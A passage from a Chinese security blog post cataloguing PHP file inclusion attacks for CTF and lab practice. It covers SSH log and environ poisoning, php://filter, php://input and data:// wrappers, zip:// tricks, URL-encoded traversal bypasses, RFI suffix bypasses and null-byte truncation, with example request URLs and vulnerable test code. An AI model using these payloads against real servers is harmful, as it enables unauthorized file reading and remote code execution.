<p>这里提供一道包含日志的CTF题目：<a href="https://chybeta.github.io/2017/08/06/SHACTF-2017-Web-writeup/#Methon-Two" target="_blank" rel="noopener">SHACTF-2017- Bon Appétit (100)-writeup</a></p>
<h3 id="SSH-log"><a href="#SSH-log" class="headerlink" title="SSH log"></a>SSH log</h3><p>利用条件：需要知道ssh-log的位置，且可读。默认情况下为 /var/log/auth.log</p>
<p>姿势：</p>
<p>用ssh连接：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ubuntu@VM-207-93-ubuntu:~$ ssh &#39;&lt;?php phpinfo(); ?&gt;&#39;@remotehost</span><br></pre></td></tr></table></figure>



<p>之后会提示输入密码等等，随便输入。</p>
<p>然后在remotehost的ssh-log中即可写入php代码：<br><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/17.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/17.png?raw=true" alt="img"></a></p>
<p>之后进行文件包含即可。</p>
<p>参考：<a href="http://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/" target="_blank" rel="noopener">RCE with LFI and SSH Log Poisoning</a></p>
<h2 id="包含environ"><a href="#包含environ" class="headerlink" title="包含environ"></a>包含environ</h2><p>利用条件：</p>
<ol>
<li>php以cgi方式运行，这样environ才会保持UA头。</li>
<li>environ文件存储位置已知，且environ文件可读。</li>
</ol>
<p>姿势：</p>
<p>proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码，则php代码会被写入到environ中。之后再包含它，即可。</p>
<p>可以参考这个：</p>
<ol>
<li><a href="http://websecuritylog.blogspot.jp/2010/06/procselfenviron-injection.html" target="_blank" rel="noopener">The proc/self/environ Injection</a></li>
<li><a href="https://www.exploit-db.com/papers/12886/" target="_blank" rel="noopener">shell via LFI - proc/self/environ method</a></li>
</ol>
<h2 id="包含fd"><a href="#包含fd" class="headerlink" title="包含fd"></a>包含fd</h2><p>跟包含environ类似。</p>
<p>参考： <a href="https://highon.coffee/blog/lfi-cheat-sheet/#procselffd-lfi-method" target="_blank" rel="noopener">LFI Cheat Sheet：/proc/self/environ LFI Method</a></p>
<h2 id="包含临时文件"><a href="#包含临时文件" class="headerlink" title="包含临时文件"></a>包含临时文件</h2><p><a href="http://images2015.cnblogs.com/blog/804631/201511/804631-20151116135028890-525890377.jpg" target="_blank" rel="noopener"><img src="http://images2015.cnblogs.com/blog/804631/201511/804631-20151116135028890-525890377.jpg" alt="img"></a></p>
<p>php中上传文件，会创建临时文件。在linux下使用/tmp目录，而在windows下使用c:\winsdows\temp目录。在临时文件被删除之前，利用竞争即可包含该临时文件。</p>
<p>由于包含需要知道包含的文件名。一种方法是进行暴力猜解，linux下使用的随机函数有缺陷，而window下只有65535中不同的文件名，所以这个方法是可行的。</p>
<p>另一种方法是配合phpinfo页面的php variables，可以直接获取到上传文件的存储路径和临时文件名，直接包含即可。这个方法可以参考[LFI With PHPInfo Assistance](<a href="https://www.insomniasec.com/downloads/publications/LFI" target="_blank" rel="noopener">https://www.insomniasec.com/downloads/publications/LFI</a> With PHPInfo Assistance.pdf)</p>
<p>类似利用临时文件的存在，竞争时间去包含的，可以看看这道CTF题：<a href="https://chybeta.github.io/2017/08/22/XMAN夏令营-2017-babyweb-writeup/" target="_blank" rel="noopener">XMAN夏令营-2017-babyweb-writeup</a></p>
<h2 id="包含上传文件"><a href="#包含上传文件" class="headerlink" title="包含上传文件"></a>包含上传文件</h2><p>利用条件：千变万化，不过至少得知道上传的文件在哪，叫啥名字。。。</p>
<p>姿势：</p>
<p>往往要配合上传的姿势，不说了，太多了。</p>
<h2 id="其余"><a href="#其余" class="headerlink" title="其余"></a>其余</h2><p>一个web服务往往会用到多个其他服务，比如ftp服务，数据库等等。这些应用也会产生相应的文件，但这就需要具体情况具体分析咯。这里就不展开了</p>
<h2 id="绕过特定字符替换replace："><a href="#绕过特定字符替换replace：" class="headerlink" title="绕过特定字符替换replace："></a>绕过特定字符替换replace：</h2><p>就是将输入的url参数中包含的“http://”、“https://”,  “. . /“  ,  “. . &quot;“等字符串替换成空的字符串，</p>
<p>1.双写</p>
<p><code>http://192.168.217.133/dvwa/vulnerabilities/fi/?page=httphttp://://127.0.0.1/1.php</code></p>
<p>使用<code>..././..././..././..././..././..././..././</code> 绕过<code>../</code>的过滤</p>
<p>2.大小写</p>
<p>3.使用file协议绕过：</p>
<p><code>http://192.168.217.133/dvwa/vulnerabilities/fi/?page=file:///1.txt</code></p>
<p><code>http://192.168.217.133/dvwa/vulnerabilities/fi/?page=file://c://1.txt</code></p>
<h2 id="绕过php函数"><a href="#绕过php函数" class="headerlink" title="绕过php函数"></a>绕过php函数</h2><h3 id="file-get-contents（）"><a href="#file-get-contents（）" class="headerlink" title="file_get_contents（）"></a>file_get_contents（）</h3><p>而file_get_contents()和file_put_contents()这样函数下，常常会构成getshell等更严重的漏洞。</p>
<ul>
<li>可以使用php://input传过去 再用post构建其里面的内容</li>
</ul>
<ul>
<li>用data://伪协议绕过<pre><code>将url改为：?xxx=data://text/plain;base64,想要file_get_contents()函数返回的值的base64编码
或者将url改为：?xxx=data:text/plain,(url编码的内容)</code></pre></li>
</ul>
<p><strong>php://filter 是一种元封装器， 设计用于数据流打开时的筛选过滤应用。 这对于一体式（all-in-one）的文件函数非常有用，类似 readfile()、 file() 和 file_get_contents()， 在数据流内容读取之前没有机会应用其他过滤器。</strong></p>
<p> 名称    描述<br>resource=&lt;要过滤的数据流&gt;       这个参数是必须的。它指定了你要筛选过滤的数据流。<br>read=&lt;读链的筛选列表&gt;           该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。<br>write=&lt;写链的筛选列表&gt;       该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。<br>&lt;；两个链的筛选列表&gt;           任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。<br>php://filter/read=convert.base64-encode/resource=upload.php</p>
<h3 id="include"><a href="#include" class="headerlink" title="include()"></a>include()</h3><p>在include函数的使用上，经常会造成任意文件读取漏洞，</p>
<p>可以使用php://filter/read=convert.base64-encode/resource=文件名(如index.php) </p>
<p>也可以使用上述的方法 php://input传过去 再用post构建其里面的内容</p>
<h1 id="指定前缀"><a href="#指定前缀" class="headerlink" title="指定前缀"></a>指定前缀</h1><p>先考虑一下指定了前缀的情况吧。测试代码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$file = $_GET[<span class="string">'file'</span>];</span><br><span class="line">	<span class="keyword">include</span> <span class="string">'/var/www/html/'</span>.$file;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h3 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h3><p>这个最简单了，简要的提一下。</p>
<p>现在在/var/log/test.txt文件中有php代码<code>&lt;?php phpinfo();?&gt;</code>，则利用<code>../</code>可以进行目录遍历，比如我们尝试访问：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">include.php?file&#x3D;..&#x2F;..&#x2F;log&#x2F;test.txt</span><br></pre></td></tr></table></figure>



<p>则服务器端实际拼接出来的路径为：/var/www/html/../../log/test.txt，也即/var/log/test.txt。从而包含成功。</p>
<p><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/18.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/18.png?raw=true" alt="img"></a></p>
<h3 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h3><p>服务器端常常会对于<code>../</code>等做一些过滤，可以用一些编码来进行绕过。下面这些总结来自《白帽子讲Web安全》。</p>
<ul>
<li>利用url编码<ul>
<li>../<ul>
<li>%2e%2e%2f</li>
<li>..%2f</li>
<li>%2e%2e/</li>
</ul>
</li>
<li>..\<ul>
<li>%2e%2e%5c</li>
<li>..%5c</li>
<li>%2e%2e\</li>
</ul>
</li>
</ul>
</li>
<li>二次编码<ul>
<li>../<ul>
<li>%252e%252e%252f</li>
</ul>
</li>
<li>..\<ul>
<li>%252e%252e%255c</li>
</ul>
</li>
</ul>
</li>
<li>容器/服务器的编码方式<ul>
<li>../<ul>
<li>..%c0%af<ul>
<li>注：<a href="https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work" target="_blank" rel="noopener">Why does Directory traversal attack %C0%AF work?</a></li>
</ul>
</li>
<li>%c0%ae%c0%ae/<ul>
<li>注：java中会把”%c0%ae”解析为”\uC0AE”，最后转义为ASCCII字符的”.”（点）</li>
<li>Apache Tomcat Directory Traversal</li>
</ul>
</li>
</ul>
</li>
<li>..\<ul>
<li>..%c1%9c</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="指定后缀"><a href="#指定后缀" class="headerlink" title="指定后缀"></a>指定后缀</h2><p>接着考虑指定后缀的情况。测试代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	$file &#x3D; $_GET[&#39;file&#39;];</span><br><span class="line">	include $file.&#39;&#x2F;test&#x2F;test.php&#39;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>



<h3 id="URL"><a href="#URL" class="headerlink" title="URL"></a>URL</h3><p>url格式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">protocol :&#x2F;&#x2F; hostname[:port] &#x2F; path &#x2F; [;parameters][?query]#fragment</span><br></pre></td></tr></table></figure>



<p>在远程文件包含漏洞（RFI）中，可以利用query或fragment来绕过后缀限制。</p>
<p>姿势一：query（？）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file&#x3D;http:&#x2F;&#x2F;remoteaddr&#x2F;remoteinfo.txt?</span><br></pre></td></tr></table></figure>



<p>则包含的文件为 <a href="http://remoteaddr/remoteinfo.txt?/test/test.php" target="_blank" rel="noopener">http://remoteaddr/remoteinfo.txt?/test/test.php</a><br>问号后面的部分<code>/test/test.php</code>，也就是指定的后缀被当作query从而被绕过。<br><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/19.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/19.png?raw=true" alt="img"></a></p>
<p>姿势二：fragment（#）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file&#x3D;http:&#x2F;&#x2F;remoteaddr&#x2F;remoteinfo.txt%23</span><br></pre></td></tr></table></figure>



<p>则包含的文件为 <a href="http://remoteaddr/remoteinfo.txt#/test/test.php" target="_blank" rel="noopener">http://remoteaddr/remoteinfo.txt#/test/test.php</a><br>问号后面的部分<code>/test/test.php</code>，也就是指定的后缀被当作fragment从而被绕过。注意需要把<code>#</code>进行url编码为<code>%23</code>。<br><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/20.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/20.png?raw=true" alt="img"></a></p>
<h3 id="利用协议"><a href="#利用协议" class="headerlink" title="利用协议"></a>利用协议</h3><p>前面有提到过利用zip协议和phar协议。假设现在测试代码为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	$file &#x3D; $_GET[&#39;file&#39;];</span><br><span class="line">	include $file.&#39;&#x2F;test&#x2F;test.php&#39;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>



<p>构造压缩包如下：<br><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/21.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/21.png?raw=true" alt="img"></a></p>
<p>其中test.php内容为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php phpinfo(); ?&gt;</span><br></pre></td></tr></table></figure>



<p>利用zip协议，注意要指定绝对路径</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file&#x3D;zip:&#x2F;&#x2F;D:\phpStudy\WWW\fileinclude\chybeta.zip%23chybeta</span><br></pre></td></tr></table></figure>



<p>则拼接后为：zip://D:\phpStudy\WWW\fileinclude\chybeta.zip#chybeta/test/test.php</p>
<p><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/22.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/22.png?raw=true" alt="img"></a></p>
<p>能成功包含。</p>
<p>在利用phar协议的时候有些问题。哪位能指教一下？<br><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/23.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/23.png?raw=true" alt="img"></a></p>
<h3 id="长度截断"><a href="#长度截断" class="headerlink" title="长度截断"></a>长度截断</h3><p>利用条件： php版本 &lt; php 5.2.8</p>
<p>目录字符串，在linux下4096字节时会达到最大值，在window下是256字节。只要不断的重复<code>./</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file&#x3D;.&#x2F;.&#x2F;.&#x2F;.&#x2F;。。。省略。。。.&#x2F;.&#x2F;shell.txt</span><br></pre></td></tr></table></figure>



<p>则后缀<code>/test/test.php</code>，在达到最大值后会被直接丢弃掉。</p>
<h3 id="0字节截断"><a href="#0字节截断" class="headerlink" title="0字节截断"></a>0字节截断</h3><p>利用条件： php版本 &lt; php 5.3.4</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file&#x3D;phpinfo.txt%00</span><br></pre></td></tr></table></figure>

<p><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/24.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/24.png?raw=true" alt="img"></a></p>
<p>能利用00截断的场景现在应该很少了：）</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" data-id="clmvoc26l0006jg7k71r22bsu" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" rel="tag">php伪协议</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/11/14/GraphiQL/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          GraphiQL
        
      </div>
    </a>
  
  
    <a href="/2019/11/11/xxe/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">xxe</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">分类</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Misc/">Misc</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/ctf/">ctf</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AF%86%E7%A0%81%E5%AD%A6/">密码学</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9D%82/">杂</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Coppersmith/" rel="tag">Coppersmith</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/GraphiQL/" rel="tag">GraphiQL</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/" rel="tag">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" rel="tag">php伪协议</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/rsa/" rel="tag">rsa</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sage/" rel="tag">sage</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag">sql注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/unctf/" rel="tag">unctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xxe/" rel="tag">xxe</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%A4%A7%E7%BB%9F%E4%B8%80%E5%9C%BA%E7%90%86%E8%AE%BA/" rel="tag">大统一场理论</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AF%86%E7%A0%81%E5%AD%A6/" rel="tag">密码学</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="tag">文件上传</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/" rel="tag">文件读取</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/Coppersmith/" style="font-size: 10px;">Coppersmith</a> <a href="/tags/GraphiQL/" style="font-size: 10px;">GraphiQL</a> <a href="/tags/PHP/" style="font-size: 10px;">PHP</a> <a href="/tags/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" style="font-size: 10px;">php伪协议</a> <a href="/tags/rsa/" style="font-size: 10px;">rsa</a> <a href="/tags/sage/" style="font-size: 10px;">sage</a> <a href="/tags/sql%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">sql注入</a> <a href="/tags/unctf/" style="font-size: 10px;">unctf</a> <a href="/tags/wp/" style="font-size: 10px;">wp</a> <a href="/tags/xxe/" style="font-size: 10px;">xxe</a> <a href="/tags/%E5%A4%A7%E7%BB%9F%E4%B8%80%E5%9C%BA%E7%90%86%E8%AE%BA/" style="font-size: 10px;">大统一场理论</a> <a href="/tags/%E5%AF%86%E7%A0%81%E5%AD%A6/" style="font-size: 20px;">密码学</a> <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" style="font-size: 10px;">文件上传</a> <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" style="font-size: 10px;">文件包含</a> <a href="/tags/%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/" style="font-size: 10px;">文件读取</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/07/">七月 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/04/">四月 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/10/">十月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/05/">五月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/04/">四月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/03/">三月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">一月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">九月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">八月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/07/">七月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">十二月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">十一月 2019</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/07/24/%E5%89%8D%E7%AB%AF/">前端</a>
          </li>
        
          <li>
            <a href="/2023/04/20/%E6%89%94%E5%87%BA%E5%8E%BB%E7%9A%84%E9%83%A8%E5%88%86/">扔出去的部分</a>
          </li>
        
          <li>
            <a href="/2023/04/20/%E4%B8%96%E7%95%8C%E8%A7%82/">世界观</a>
          </li>
        
          <li>
            <a href="/2022/10/01/%E6%9D%82/">杂</a>
          </li>
        
          <li>
            <a href="/2021/05/15/%E7%BD%91%E6%96%87/">网文</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2023 zhiliya<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>